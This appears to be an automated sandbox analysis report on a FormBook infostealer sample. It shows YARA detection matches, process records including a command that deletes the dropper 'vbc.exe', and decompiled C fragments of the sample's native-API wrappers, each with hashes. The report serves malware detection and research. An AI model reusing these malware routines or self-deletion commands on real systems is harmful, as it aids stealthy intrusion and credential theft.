                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:54
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x4ab10000
                                                                                                                                                  File size:302592 bytes
                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                    Executed Functions

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: R=A$R=A
                                                                                                                                                    • API String ID: 2738559852-3742021989
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: R=A
                                                                                                                                                    • API String ID: 2738559852-4215937652
                                                                                                                                                    • Opcode ID: 25c2477f0578a22a6c5c70e1a0f0fec5a8b830f87acfd3207ae74e9c157d6bfa
                                                                                                                                                    • Instruction ID: db6f611f201b5ff76dc7d72d112885db939561c6fce4b5ddb98ab49daad2e5e9
                                                                                                                                                    • Opcode Fuzzy Hash: 25c2477f0578a22a6c5c70e1a0f0fec5a8b830f87acfd3207ae74e9c157d6bfa
                                                                                                                                                    • Instruction Fuzzy Hash: AEF049B6200108AFCB14DF99DC40DEB77A9EF88320F108649FA1D97280CA30E8508BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 2fbd8eca8f0d661bc804492f962c65bd68f3bfd03453813afd5658788dee58e0
                                                                                                                                                    • Instruction ID: edfe91a1534d6eabfe874913806b36666789abae1edceba7c0df1ee940c9a8e4
                                                                                                                                                    • Opcode Fuzzy Hash: 2fbd8eca8f0d661bc804492f962c65bd68f3bfd03453813afd5658788dee58e0
                                                                                                                                                    • Instruction Fuzzy Hash: 070157B1200208ABCB14DF99DC85DEB77ACAF88610F14869DF9089B242CA30E850CBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                    				char* _v8;
                                                                                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                    				char _v536;
                                                                                                                                                    				void* _t15;
                                                                                                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                    				void* _t30;
                                                                                                                                                    				void* _t31;
                                                                                                                                                    				void* _t32;
                                                                                                                                                    
                                                                                                                                                    				_v8 =  &_v536;
                                                                                                                                                    				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                                                                                                    				_t31 = _t30 + 0xc;
                                                                                                                                                    				if(_t15 != 0) {
                                                                                                                                                    					_t17 = E0041AF70(__eflags, _v8);
                                                                                                                                                    					_t32 = _t31 + 4;
                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                    						E0041B1F0( &_v12, 0);
                                                                                                                                                    						_t32 = _t32 + 8;
                                                                                                                                                    					}
                                                                                                                                                    					_t18 = E00419300(_v8);
                                                                                                                                                    					_v16 = _t18;
                                                                                                                                                    					__eflags = _t18;
                                                                                                                                                    					if(_t18 == 0) {
                                                                                                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                    						return _v16;
                                                                                                                                                    					}
                                                                                                                                                    					return _t18;
                                                                                                                                                    				} else {
                                                                                                                                                    					return _t15;
                                                                                                                                                    				}
                                                                                                                                                    			}














                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                    				long _t21;
                                                                                                                                                    				void* _t31;
                                                                                                                                                    
                                                                                                                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                    				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                    				return _t21;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004181BF(intOrPtr __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                    				intOrPtr _v117;
                                                                                                                                                    				long _t22;
                                                                                                                                                    				void* _t33;
                                                                                                                                                    
                                                                                                                                                    				_v117 = __edx;
                                                                                                                                                    				_t16 = _a4;
                                                                                                                                                    				_t4 = _t16 + 0xc40; // 0xc40
                                                                                                                                                    				E00418DC0(_t33, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                    				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                    				return _t22;
                                                                                                                                                    			}







                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 16b2af6f4a591d3dfd2d1ca1a365b7bf1686fd21e6d08d76840a50c7c6bcaeba
                                                                                                                                                    • Instruction ID: 83197e33350ab80e0b22453d681ab6f626e3f7e42f9ce8b733784f3fa2032f29
                                                                                                                                                    • Opcode Fuzzy Hash: 16b2af6f4a591d3dfd2d1ca1a365b7bf1686fd21e6d08d76840a50c7c6bcaeba
                                                                                                                                                    • Instruction Fuzzy Hash: 4301B2B2200208AFCB48CF98DC85EEB77A9AF8C354F15824DFA0DD7241C630E851CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 293ef8066cc8a43bd6b15689a5aa6bfdd3585c3cd61ae5965657bd694355d1f9
                                                                                                                                                    • Instruction ID: a6ea97e564cfa4784b00443735e850fa342249bd65f80f46e3c4a39265dcb636
                                                                                                                                                    • Opcode Fuzzy Hash: 293ef8066cc8a43bd6b15689a5aa6bfdd3585c3cd61ae5965657bd694355d1f9
                                                                                                                                                    • Instruction Fuzzy Hash: 1AF0D4B6214208ABCB14DF89DC81EE777A9AF8C654F158549FA1997241CA30E911CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 20%
                                                                                                                                                    			E004183A0(void* __ebx, signed int __ecx, signed int* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                    				long _t15;
                                                                                                                                                    				void* _t24;
                                                                                                                                                    
                                                                                                                                                    				_t11 = _a4;
                                                                                                                                                    				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
                                                                                                                                                    				 *__edx =  *__edx ^ __ecx;
                                                                                                                                                    				_push(__ecx);
                                                                                                                                                    				_t4 = _t11 + 0xc60; // 0xca0
                                                                                                                                                    				_push(_t11);
                                                                                                                                                    				E00418DC0(_t24);
                                                                                                                                                    				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                    				return _t15;
                                                                                                                                                    			}







                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E004182EA(void* __ecx, void* __esi, intOrPtr _a4, void* _a8) {
                                                                                                                                                    				long _t9;
                                                                                                                                                    				void* _t13;
                                                                                                                                                    
                                                                                                                                                    				asm("arpl [edi-0x1374aaf2], dx");
                                                                                                                                                    				_t6 = _a4;
                                                                                                                                                    				_t3 = _t6 + 0x10; // 0x300
                                                                                                                                                    				_t4 = _t6 + 0xc50; // 0x409743
                                                                                                                                                    				E00418DC0(_t13, _a4, _t4,  *_t3, 0, 0x2c);
                                                                                                                                                    				_t9 = NtClose(_a8); // executed
                                                                                                                                                    				return _t9;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    • Opcode ID: 1dca327da4914f1c760f7d67deea9c915382c65cea6f5937df3c4bd8022f8101
                                                                                                                                                    • Instruction ID: 9231b874e7649c0518a422970b631f3d7c59e0f03752c1b25ab94d79046153b4
                                                                                                                                                    • Opcode Fuzzy Hash: 1dca327da4914f1c760f7d67deea9c915382c65cea6f5937df3c4bd8022f8101
                                                                                                                                                    • Instruction Fuzzy Hash: 5CE08C31200210ABE714EFA4CC86EE7B768EF44350F10489EF9589B241EA30B9108790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004182F0(intOrPtr _a4, void* _a8) {
                                                                                                                                                    				long _t8;
                                                                                                                                                    				void* _t11;
                                                                                                                                                    
                                                                                                                                                    				_t5 = _a4;
                                                                                                                                                    				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                    				_t3 = _t5 + 0xc50; // 0x409743
                                                                                                                                                    				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                    				_t8 = NtClose(_a8); // executed
                                                                                                                                                    				return _t8;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
